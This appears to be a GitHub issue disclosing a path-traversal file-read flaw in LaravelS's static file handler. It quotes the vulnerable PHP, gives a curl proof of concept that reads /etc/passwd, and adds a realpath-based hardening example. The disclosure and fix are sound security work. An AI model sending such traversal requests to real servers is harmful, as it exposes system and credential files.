Closed zhazhami closed 1 year ago
Your software version (Screenshot of your startup)
Detail description about this issue (error/log)
When the setting "handle_static" is true, LaravelS is affected by an LFI vulnerability.
vulnerable file: /src/Illuminate/Laravel.php
```php
public function handleStatic(IlluminateRequest $request)
{
    $uri = $request->getRequestUri();
    if (isset(self::$staticBlackList[$uri])) {
        return false;
    }
    // NUL bytes are stripped, but ".." segments are left in place
    $uri = (string)str_replace("\0", '', urldecode($uri));
    // the decoded URI is concatenated directly onto static_path
    $requestFile = $this->conf['static_path'] . $uri;
    if (is_file($requestFile)) {
        return $this->createStaticResponse($requestFile, $request);
    }
    ...
```
Some reproducible code blocks and steps
Vulnerability PoC:
```sh
curl --path-as-is "http://127.0.0.1:5200/../../../../../../etc/passwd"
```
Thanks.
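For comparison, an added example (not LaravelS's own code) of how the static-file path check described above can be hardened: the requested path is resolved with `realpath()` and only served if it stays under the configured static root. The `resolveStaticFile()` function and the temporary directory it is demonstrated against are assumptions for this illustration.

```php
<?php
// Added hardening example; not code from the LaravelS project.
// Takes the configured static root and the raw request URI, and returns the
// absolute file path to serve, or null when the request must be refused.
function resolveStaticFile(string $staticPath, string $requestUri): ?string
{
    // Only the path component matters; drop query string and fragment.
    $path = parse_url($requestUri, PHP_URL_PATH);
    if (!is_string($path) || $path === '') {
        return null;
    }
    $path = rawurldecode($path);
    // Refuse NUL bytes instead of silently stripping them.
    if (strpos($path, "\0") !== false) {
        return null;
    }
    $root = realpath($staticPath);
    if ($root === false) {
        return null;
    }
    // realpath() collapses "..", duplicate separators and symlinks, and
    // returns false when the target does not exist.
    $candidate = realpath($root . DIRECTORY_SEPARATOR . ltrim($path, '/'));
    if ($candidate === false || !is_file($candidate)) {
        return null;
    }
    // The resolved file must sit inside the static root. The trailing
    // separator prevents "/var/www/public2" from matching "/var/www/public".
    if (strpos($candidate, $root . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $candidate;
}

// Constructed demonstration: a throwaway static root with one CSS file.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'laravels_static_demo';
@mkdir($root . DIRECTORY_SEPARATOR . 'css', 0777, true);
file_put_contents($root . DIRECTORY_SEPARATOR . 'css' . DIRECTORY_SEPARATOR . 'app.css', 'body{}');

// The traversal URI from the issue resolves outside $root and is refused.
var_dump(resolveStaticFile($root, '/../../../../../../etc/passwd'));
// A file inside the static root is resolved to its absolute path.
var_dump(resolveStaticFile($root, '/css/app.css?v=1'));
```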